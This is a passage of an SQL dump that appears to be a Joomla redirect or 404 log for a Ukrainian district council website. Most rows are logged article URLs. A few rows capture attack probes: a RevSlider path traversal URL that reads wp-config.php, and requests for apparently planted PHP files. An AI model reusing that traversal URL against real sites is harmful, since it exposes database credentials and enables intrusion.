00:00:00',301),(26900,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1115:-24-&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-07 15:30:49','0000-00-00 00:00:00',301),(26901,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=en&limitstart=10','','','',3,0,'2016-03-07 15:57:12','0000-00-00 00:00:00',301),(26903,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=541:2012-01-26-11-55-32&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-07 16:20:53','0000-00-00 00:00:00',301),(26904,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=175:2010-11-25-06-59-30&catid=11&Itemid=16&lang=ru','','','',1,0,'2016-03-07 16:37:56','0000-00-00 00:00:00',301),(26905,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=112:2010-08-27-12-27-21&catid=11&Itemid=16&lang=en','','','',1,0,'2016-03-07 16:39:55','0000-00-00 00:00:00',301),(26906,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=537:2012-01-23-06-57-51&catid=11&Itemid=14&lang=uk','','','',1,0,'2016-03-07 16:42:14','0000-00-00 00:00:00',301),(26907,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=803:-2012-&catid=11&lang=en','','','',1,0,'2016-03-07 16:57:40','0000-00-00 00:00:00',301),(26908,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38:--19122011-&lang=uk&layout=blog&limitstart=30&option=com_content&view=category','','http://go.mail.ru/search_images','',3,0,'2016-03-07 17:19:42','0000-00-00 00:00:00',301),(26909,'http://www.malyn-rayrada.org.ua/index.php?Itemid=9&catid=6&id=6:2010-06-05-14-26-47&lang=en&option=com_content&view=article','','','',1,0,'2016-03-07 18:54:20','0000-00-00 00:00:00',301),(26910,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=959:2013-03-11-06-19-41&Itemid=88&lang=en&option=com_content&view=article','','','',30,0,'2016-03-07 20:07:55','0000-00-00 00:00:00',301),(26911,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=1106:-qq&Itemid=18&lang=ru&option=com_content&view=article','','','',4,0,'2016-03-07 20:08:11','0000-00-00 00:00:00',301),(26912,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1066:-23-&Itemid=14&lang=en&option=com_content&view=article','','','',33,0,'2016-03-07 20:08:30','0000-00-00 00:00:00',301),(26913,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=451:-2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-07 20:38:36','0000-00-00 00:00:00',301),(26914,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','','',1,0,'2016-03-07 22:48:51','0000-00-00 00:00:00',301),(26915,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=245:2011-02-09-08-46-46&catid=11&Itemid=14&lang=ru','','','',1,0,'2016-03-08 01:20:34','0000-00-00 00:00:00',301),(26916,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=106:-l-r&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',1,0,'2016-03-08 01:25:37','0000-00-00 00:00:00',301),(26917,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=864:------qq&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-08 01:28:30','0000-00-00 00:00:00',301),(26918,'http://www.malyn-rayrada.org.ua/index.php/--26122013-/688-pro-zminu-nazvi-novovorob’ivskogo-zagalnoosvitnogo','','','',1,0,'2016-03-08 01:30:16','0000-00-00 00:00:00',301),(26920,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=3&lang=ru&limitstart=15','','','',1,0,'2016-03-08 03:56:37','0000-00-00 00:00:00',301),(26921,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=413:-----------2011-2012-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-08 04:10:30','0000-00-00 00:00:00',301),(26922,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=544:2012-01-26-12-03-44&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-08 04:35:45','0000-00-00 00:00:00',301),(26923,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=846:2012-12-10-14-06-00&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-08 04:37:29','0000-00-00 00:00:00',301),(26924,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1008:2013-05-20-07-02-57&catid=11&Itemid=14&lang=en','','','',1,0,'2016-03-08 05:41:41','0000-00-00 00:00:00',301),(26925,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&Itemid=14&lang=uk','','','',1,0,'2016-03-08 05:42:46','0000-00-00 00:00:00',301),(26926,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-08 06:41:08','0000-00-00 00:00:00',301),(26927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=51:2010-06-16-14-19-01&catid=1:-14052010&Itemid=10&lang=en','','','',1,0,'2016-03-08 07:26:37','0000-00-00 00:00:00',301),(26928,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39:-22022012-&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-08 07:27:19','0000-00-00 00:00:00',301),(26929,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/15-2010-06-05-12-55-45/---1932-33-/18-2010-06-06-10-06-41?Itemid=0&lang=ru','','','',1,0,'2016-03-08 07:31:28','0000-00-00 00:00:00',301),(26930,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2016-03-08 07:49:40','0000-00-00 00:00:00',301),(26931,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&id=49:--12042013-&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',2,0,'2016-03-08 08:48:02','0000-00-00 00:00:00',301),(26932,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=635:-2011-2015-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-08 08:51:40','0000-00-00 00:00:00',301),(26934,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=486:-l-28r&catid=38:--19122011-&Itemid=73&lang=uk','','','',1,0,'2016-03-08 09:56:53','0000-00-00 00:00:00',301),(26935,'http://www.malyn-rayrada.org.ua/index.php/309-vitaemo-z-dnem-peremogi_2/','','http://go.mail.ru/search_images','',2,0,'2016-03-08 11:46:12','0000-00-00 00:00:00',301),(26936,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=40:--28032012-&id=597:-l-r-2011-&itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2016-03-08 11:52:55','0000-00-00 00:00:00',301),(26937,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1282-pro-viznachennya-umov-oplati-pratsi-golovi-rajonnoji-radi-ta-zastupnika-golovi-rajonnoji-radi-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-03-08 12:01:06','0000-00-00 00:00:00',301),(26938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=196:---------------------2005-2010-&catid=29&Itemid=60&lang=en','','','',3,0,'2016-03-08 13:14:11','0000-00-00 00:00:00',301),(26939,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39:-22022012-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',2,0,'2016-03-08 13:47:27','0000-00-00 00:00:00',301),(26940,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=503:-2017-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-08 13:48:28','0000-00-00 00:00:00',301),(26941,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?id=1324:2014-05-27-13-24-07&catid=59&lang=uk','','','',3,0,'2016-03-08 14:29:26','0000-00-00 00:00:00',301),(26942,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=957:199-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-08 16:18:56','0000-00-00 00:00:00',301),(26943,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=878:2012-12-21-16-59-28&Itemid=85&lang=uk&option=com_content&view=article','','','',12,0,'2016-03-08 16:31:08','0000-00-00 00:00:00',301),(26944,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=919:2013-01-31-10-15-40&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-08 16:37:28','0000-00-00 00:00:00',301),(26945,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1059:2013-07-24-05-42-15&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-08 16:37:34','0000-00-00 00:00:00',301),(26946,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=441:-l-2011-2014-r-&catid=37:--21102011-&Itemid=72&lang=en','','','',3,0,'2016-03-08 16:38:09','0000-00-00 00:00:00',301),(26947,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&Itemid=14&lang=en&option=com_content&view=article','','','',12,0,'2016-03-08 17:11:57','0000-00-00 00:00:00',301),(26948,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/825--q-q?lang=ru','','','',1,0,'2016-03-08 17:12:05','0000-00-00 00:00:00',301),(26949,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=555:2012-01-27-13-50-13&catid=39&Itemid=76&lang=en','','','',2,0,'2016-03-08 17:12:09','0000-00-00 00:00:00',301),(26950,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/941-2013-02-27-14-30-15?Itemid=0&lang=uk','','','',1,0,'2016-03-08 17:12:12','0000-00-00 00:00:00',301),(26951,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=745:2012-07-30-09-12-07&lang=ru&option=com_content&view=article','','','',5,0,'2016-03-08 17:12:21','0000-00-00 00:00:00',301),(26952,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1130:2013-11-07-14-04-12&lang=en&option=com_content&view=article','','','',2,0,'2016-03-08 17:12:28','0000-00-00 00:00:00',301),(26953,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=827:2012-11-20-17-44-21&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-08 17:15:45','0000-00-00 00:00:00',301),(26954,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=462:-2012-&Itemid=73&lang=en&option=com_content&view=article','','','',6,0,'2016-03-08 17:22:01','0000-00-00 00:00:00',301),(26955,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=ru&layout=blog&limitstart=30&option=com_content&view=category','','','',1,0,'2016-03-08 17:37:56','0000-00-00 00:00:00',301),(26956,'http://www.malyn-rayrada.org.ua/libraries/lola.php','','','',1,0,'2016-03-08 17:47:43','0000-00-00 00:00:00',301),(26957,'http://www.malyn-rayrada.org.ua/libraries/legacy/log/js.php','','','',1,0,'2016-03-08 17:47:44','0000-00-00 00:00:00',301),(26958,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?id=1318:-3110&catid=59&lang=en','','','',2,0,'2016-03-08 19:14:07','0000-00-00 00:00:00',301),(26959,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-08 19:24:18','0000-00-00 00:00:00',301),(26960,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1004:2013-05-04-11-41-00&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-08 21:21:11','0000-00-00 00:00:00',301),(26961,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=753:2012-09-05-09-48-36&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-08 21:21:16','0000-00-00 00:00:00',301),(26962,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1059:2013-07-24-05-42-15&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-08 21:21:27','0000-00-00 00:00:00',301),(26963,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=412:-165-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-08 21:56:49','0000-00-00 00:00:00',301),(26964,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?id=1345:2014-06-17-07-48-07&catid=59&lang=en','','','',5,0,'2016-03-08 23:36:01','0000-00-00 00:00:00',301),(26965,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=934:---------6---16112010-5---------------&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-09 00:21:26','0000-00-00 00:00:00',301),(26966,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=775:2012-10-02-09-35-53&catid=36&Itemid=70&lang=en','','','',6,0,'2016-03-09 00:32:28','0000-00-00 00:00:00',301),(26967,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-09 01:26:03','0000-00-00 00:00:00',301),(26968,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-09 01:30:45','0000-00-00 00:00:00',301),(26969,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&id=59:--20062014-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2016-03-09 02:16:52','0000-00-00 00:00:00',301),(26970,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-09 02:42:35','0000-00-00 00:00:00',301),(26971,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=745:2012-07-30-09-12-07&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-09 02:56:29','0000-00-00 00:00:00',301),(26972,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=815:-16-6-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-09 02:56:30','0000-00-00 00:00:00',301),(26973,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=15&id=862:-qq&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-09 03:50:15','0000-00-00 00:00:00',301),(26974,'http://malyn-rayrada.org.ua/index.php?id=13&itemid=33&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-09 04:56:30','0000-00-00 00:00:00',301),(26975,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=591:2012-02-27-14-31-33&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-09 05:02:12','0000-00-00 00:00:00',301),(26976,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=815:-16-6-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-09 06:23:08','0000-00-00 00:00:00',301),(26977,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=827:2012-11-20-17-44-21&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-09 06:23:09','0000-00-00 00:00:00',301),(26978,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-78','','','',2,0,'2016-03-09 06:37:59','0000-00-00 00:00:00',301),(26979,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-87','','','',2,0,'2016-03-09 06:38:03','0000-00-00 00:00:00',301),(26980,'http://malyn-rayrada.org.ua/index.php/729-vitaemo-usih-zhinok-iz-svjatom-vesni','','','',6,0,'2016-03-09 06:48:34','0000-00-00 00:00:00',301),(26981,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1283-pro-rajonnij-byudzhet-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-03-09 06:49:14','0000-00-00 00:00:00',301),(26982,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=483:-2012-2016-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-09 08:08:01','0000-00-00 00:00:00',301),(26983,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=829:24-1600-l-r&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-09 08:21:12','0000-00-00 00:00:00',301),(26984,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2016-03-09 08:27:04','0000-00-00 00:00:00',301),(26985,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=344:2011-06-15-12-25-27&catid=34:--15062011-&Itemid=68&lang=ru','','','',1,0,'2016-03-09 08:29:04','0000-00-00 00:00:00',301),(26986,'http://malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1255:2014-03-27-06-02-11&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-09 09:08:02','0000-00-00 00:00:00',301),(26987,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=730:2012-07-02-05-04-18&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-09 09:24:12','0000-00-00 00:00:00',301),(26988,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1093:------------2017-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-09 09:41:49','0000-00-00 00:00:00',301),(26989,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=639:2012-04-03-12-41-18&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-09 09:41:51','0000-00-00 00:00:00',301),(26990,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=791:2012-10-17-06-06-34&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-09 09:54:06','0000-00-00 00:00:00',301),(26991,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&id=51&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-09 10:59:30','0000-00-00 00:00:00',301),(26992,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=211:2010-12-15-14-46-24&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-09 11:15:22','0000-00-00 00:00:00',301),(26993,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=939:-18-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-09 11:29:26','0000-00-00 00:00:00',301),(26994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=563:-30012012185-12&catid=39:-22022012-&Itemid=76&lang=en','','','',1,0,'2016-03-09 11:30:24','0000-00-00 00:00:00',301),(26995,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1059:2013-07-24-05-42-15&lang=uk&option=com_content&view=article','','','',4,0,'2016-03-09 11:33:10','0000-00-00 00:00:00',301),(26996,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=687:2012-05-24-11-21-04','','','',1,0,'2016-03-09 11:33:26','0000-00-00 00:00:00',301),(26997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=825:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2016-03-09 11:34:11','0000-00-00 00:00:00',301),(26998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=315:2011-05-20-13-07-47&catid=33:-20052011&Itemid=66&lang=en','','','',1,0,'2016-03-09 11:39:29','0000-00-00 00:00:00',301),(26999,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=824:-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-09 12:15:46','0000-00-00 00:00:00',301),(27000,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=15&id=864:-qq&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-09 12:15:48','0000-00-00 00:00:00',301),(27001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=518:2011-12-23-13-04-41&catid=11&Itemid=14&lang=uk','','','',1,0,'2016-03-09 12:38:05','0000-00-00 00:00:00',301),(27002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=120:---q---2010q&catid=11&Itemid=16&lang=ru','','','',1,0,'2016-03-09 12:39:59','0000-00-00 00:00:00',301),(27003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=443:-2011-&catid=37:--21102011-&Itemid=72&lang=uk','','','',1,0,'2016-03-09 13:16:46','0000-00-00 00:00:00',301),(27004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=191:2010-12-15-13-27-06&catid=29&Itemid=60&lang=en','','','',18,0,'2016-03-09 13:24:50','0000-00-00 00:00:00',301),(27005,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=825:-q-q&Itemid=&lang=ru&option=com_content&view=article','','','',18,0,'2016-03-09 13:38:45','0000-00-00 00:00:00',301),(27006,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/687-2012-05-24-11-21-04?lang=uk','','','',4,0,'2016-03-09 14:18:17','0000-00-00 00:00:00',301),(27007,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=1238:2014-03-09-06-41-00','','','',1,0,'2016-03-09 14:24:31','0000-00-00 00:00:00',301),(27008,'http://malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=206:2010-12-15-14-19-27&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-09 14:42:50','0000-00-00 00:00:00',301),(27009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=631:-i-2012-&catid=42:--16052012-&Itemid=80&lang=uk','','','',17,0,'2016-03-09 15:04:29','0000-00-00 00:00:00',301),(27010,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1054:2013-07-19-11-38-20&Itemid=92&lang=en&option=com_content&view=article','','','',18,0,'2016-03-09 15:10:26','0000-00-00 00:00:00',301),(27011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=229:-2011-&catid=30:--30122010-&Itemid=61&lang=en','','','',17,0,'2016-03-09 15:10:47','0000-00-00 00:00:00',301),(27012,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=730:2012-07-02-05-04-18','','','',18,0,'2016-03-09 15:12:21','0000-00-00 00:00:00',301),(27013,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=507:2011-12-19-17-10-52&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-09 15:55:28','0000-00-00 00:00:00',301),(27014,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=957:199-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2016-03-09 15:59:28','0000-00-00 00:00:00',301),(27015,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1213:2014-02-14-13-53-12&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-03-09 16:00:01','0000-00-00 00:00:00',301),(27016,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1044:2013-07-05-11-26-05&Itemid=92&lang=en&option=com_content&view=article','','','',69,0,'2016-03-09 16:00:10','0000-00-00 00:00:00',301),(27017,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=957:199-&Itemid=&lang=uk&option=com_content&view=article','','','',22,0,'2016-03-09 16:00:31','0000-00-00 00:00:00',301),(27018,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1066:-23-&Itemid=14&lang=ru&option=com_content&view=article','','','',21,0,'2016-03-09 16:01:26','0000-00-00 00:00:00',301),(27019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&catid=4:2010-06-05-12-51-18&Itemid=8&lang=en','','','',20,0,'2016-03-09 16:05:08','0000-00-00 00:00:00',301),(27020,'http://www.malyn-rayrada.org.ua/about-as/','','','',3,0,'2016-03-09 16:13:27','0000-00-00 00:00:00',301),(27021,'http://www.malyn-rayrada.org.ua/category/reabilitatsiya/kostyli-trosti-aksessuary/','','','',6,0,'2016-03-09 16:13:30','0000-00-00 00:00:00',301),(27022,'http://www.malyn-rayrada.org.ua/category/reabilitatsiya/kostyli-trosti-aksessuary/?page=2','','','',5,0,'2016-03-09 16:13:46','0000-00-00 00:00:00',301),(27023,'http://www.malyn-rayrada.org.ua/category/reabilitatsiya/kostyli-trosti-aksessuary/?page=3','','','',5,0,'2016-03-09 16:13:49','0000-00-00 00:00:00',301),(27024,'http://www.malyn-rayrada.org.ua/category/reabilitatsiya/kostyli-trosti-aksessuary/?page=4','','','',5,0,'2016-03-09 16:13:51','0000-00-00 00:00:00',301),(27025,'http://www.malyn-rayrada.org.ua/contacts/','','','',5,0,'2016-03-09 16:13:56','0000-00-00 00:00:00',301),(27026,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=678:----------------2012-2014-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-09 16:15:58','0000-00-00 00:00:00',301),(27027,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=540:-2010-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-09 16:15:58','0000-00-00 00:00:00',301),(27028,'http://www.malyn-rayrada.org.ua/kostyl-podlokotnyy-fs-937l/','','','',5,0,'2016-03-09 16:24:01','0000-00-00 00:00:00',301),(27029,'http://www.malyn-rayrada.org.ua/kostyl-podlokotnyy-ml-2-shans/','','','',5,0,'2016-03-09 16:24:08','0000-00-00 00:00:00',301),(27030,'http://www.malyn-rayrada.org.ua/kostyl-podlokotnyy-osd-8005--seryy-bu/','','','',5,0,'2016-03-09 16:24:15','0000-00-00 00:00:00',301),(27031,'http://www.malyn-rayrada.org.ua/kostyl-podlokotnyy-ossenberg-klassiker-220-dk/','','','',5,0,'2016-03-09 16:24:22','0000-00-00 00:00:00',301),(27032,'http://www.malyn-rayrada.org.ua/kostyl-podlokotnyy-s-ustroystvom-protiv-skolzheniya-ml-1a-shans/','','','',5,0,'2016-03-09 16:24:33','0000-00-00 00:00:00',301),(27033,'http://www.malyn-rayrada.org.ua/kostyl-podlokotnyy-s-ustroystvom-protiv-skolzheniya-ml-2a-shans/','','','',5,0,'2016-03-09 16:24:36','0000-00-00 00:00:00',301),(27034,'http://www.malyn-rayrada.org.ua/kostyl-podmyshechnyy-alyuminievyy-mpa-shans/','','','',5,0,'2016-03-09 16:24:41','0000-00-00 00:00:00',301),(27035,'http://www.malyn-rayrada.org.ua/kostyl-podmyshechnyy-derevyannyy-md-shans/','','','',5,0,'2016-03-09 16:24:49','0000-00-00 00:00:00',301),(27036,'http://www.malyn-rayrada.org.ua/kostyl-podmyshechnyy-stalnoy-mp-shans/','','','',5,0,'2016-03-09 16:24:57','0000-00-00 00:00:00',301),(27037,'http://www.malyn-rayrada.org.ua/kostyl-podmyshechnyy-stalnoy-s-ustroystvom-protivoskolzheniya-mpp-1a-shans/','','','',5,0,'2016-03-09 16:25:03','0000-00-00 00:00:00',301),(27038,'http://www.malyn-rayrada.org.ua/kostyli-podlokotnye/','','','',5,0,'2016-03-09 16:25:12','0000-00-00 00:00:00',301),(27039,'http://www.malyn-rayrada.org.ua/kostyli-podlokotnye-fs-923l-bu/','','','',5,0,'2016-03-09 16:25:19','0000-00-00 00:00:00',301),(27040,'http://www.malyn-rayrada.org.ua/kostyli-podlokotnye-fs-933l/','','','',5,0,'2016-03-09 16:25:26','0000-00-00 00:00:00',301),(27041,'http://www.malyn-rayrada.org.ua/kostyli-podlokotnye-fs-933l-bu/','','','',5,0,'2016-03-09 16:25:33','0000-00-00 00:00:00',301),(27042,'http://www.malyn-rayrada.org.ua/kostyli-podlokotnye-fs-937l-bu/','','','',5,0,'2016-03-09 16:25:41','0000-00-00 00:00:00',301),(27043,'http://www.malyn-rayrada.org.ua/kostyli-podlokotnye-s-myagkoy-ruchkoy-osd/','','','',5,0,'2016-03-09 16:25:45','0000-00-00 00:00:00',301),(27044,'http://www.malyn-rayrada.org.ua/kostyli-podlokotnye-s-regulirovkoy-podderzhki-osd-86011/','','','',5,0,'2016-03-09 16:25:49','0000-00-00 00:00:00',301),(27045,'http://www.malyn-rayrada.org.ua/kostyli-podmyshechnye-fs-925m/','','','',5,0,'2016-03-09 16:25:53','0000-00-00 00:00:00',301),(27046,'http://www.malyn-rayrada.org.ua/kostyli-podmyshechnye-fs-925s/','','','',5,0,'2016-03-09 16:25:56','0000-00-00 